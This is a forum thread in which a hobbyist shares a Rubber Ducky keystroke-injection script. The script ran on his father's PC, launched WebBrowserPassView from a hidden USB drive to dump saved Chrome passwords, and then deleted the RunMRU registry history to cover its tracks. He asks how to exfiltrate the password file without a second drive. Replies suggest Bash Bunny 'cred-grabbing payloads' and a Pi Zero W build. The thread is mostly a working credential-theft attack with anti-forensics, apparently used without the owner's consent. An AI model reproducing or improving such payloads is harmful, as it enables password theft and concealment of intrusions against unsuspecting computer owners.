making the payload fatser

hey, I just got my first rubber ducky today and i already ran my first payload on my dad ( he was like *.*) . so before executing, i downloaded WebBrowserPassView version 1.45 where the program would run and create a .txt file where all the chrome passwords are saved in and put it on a usb that i bought. this usb is very small(maybe the the size of my nail) and i plugged it minutes before my ducky, after plugging the usb i saw that the usb was recognized as drive F: so at this moment i wrote my script

REM open cmd
DELAY 1000
GUI R
DELAY 200
STRING cmd
DELAY 150
ENTER
REM resize cmd
DELAY 200
STRING MODE CON: COLS=15 LINES=1
DELAY 10
ENTER
REM access the F: drive
STRING F:
ENTER
REM launch the bat file
DELAY 200
STRING LAUNCH.BAT
ENTER
DELAY 300
REM clear my tracks
STRING  powershell "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue
DELAY 100
ENTER
DELAY 500
REM exit cmd
STRING EXIT
DELAY 10 
ENTER

After that i remove the ducky and wait for the appropriate time to remove the usb and plug it in another computer and get the password.txt

So my question is, is there a way to access those files without using another usb(i heard about the twin ducky, i might try it, but im open for other suggesions) thanks!!

1 minute ago, Rainman_34 said:

you would have to save the results to a .txt file on the computer first and then export them that way.  Check out ducktoolkit.com.  You can check some things you want done and it will show you the coding and take the ideas from that.

Thanks for taking the time to read and reply!

You could make your own Ducky with a Pi Zero W (bit more DIY than out-of-the-box) or you can buy a Bash Bunny which has on-board support for ethernet, Ducky and storage attacks. There are many cred-grabbing payloads available for the BB. Those are the simplest ways if you're looking for a 1-USB-does-all solution. Might not be the cheapest ways though.